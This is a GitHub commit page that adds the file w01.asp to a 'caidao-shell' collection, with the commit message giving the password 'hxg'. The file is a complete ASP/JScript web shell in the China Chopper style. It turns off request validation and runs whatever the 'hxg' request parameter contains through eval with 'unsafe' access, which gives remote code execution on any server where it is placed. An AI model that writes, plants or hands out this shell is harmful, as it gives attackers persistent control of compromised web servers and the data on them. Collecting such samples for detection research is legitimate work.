Skip to content

Commit

Permalink
Create w01.asp
Browse files Browse the repository at this point in the history
password : hxg
  • Loading branch information
tennc committed Jun 2, 2016
1 parent 0871e1a commit 8b3b5d0
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions caidao-shell/w01.asp
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var keng
keng = Request.Item["hxg"];
Response.Write(eval(keng,"unsafe"));
%>

0 comments on commit 8b3b5d0

Please sign in to comment.